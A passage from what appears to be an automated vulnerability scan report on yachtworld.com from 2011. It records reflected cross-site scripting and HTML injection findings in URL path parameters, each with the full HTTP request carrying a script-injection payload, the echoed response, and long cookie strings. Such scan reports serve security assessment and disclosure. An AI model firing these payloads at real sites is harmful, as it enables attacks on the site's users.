savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:08 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Mainship/1acdd3"><script>alert(1)</script>dca333328d7/A-1">
...[SNIP]...

3.259. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Maxum/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6091e"><script>alert(1)</script>d0b967e7095 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type6091e"><script>alert(1)</script>d0b967e7095/Maxum/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:54 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type6091e"><script>alert(1)</script>d0b967e7095/260+Cruiser">
...[SNIP]...

3.260. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Maxum/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4dd"><a>5f3a0108965 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Maxum4e4dd"><a>5f3a0108965/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Maxum4e4dd"><a>5f3a0108965/A-1">
...[SNIP]...

3.261. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Maxum/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff1f"><script>alert(1)</script>b4d2fff4b7b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Maxum/1bff1f"><script>alert(1)</script>b4d2fff4b7b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:04 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Maxum/1bff1f"><script>alert(1)</script>b4d2fff4b7b/A-1">
...[SNIP]...

3.262. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Pursuit/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f970a"><a>93e7bbbac3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typef970a"><a>93e7bbbac3f/Pursuit/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:22 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typef970a"><a>93e7bbbac3f/Pursuit/1">
...[SNIP]...

3.263. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Pursuit/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262f0"><a>29d9123605e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Pursuit262f0"><a>29d9123605e/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 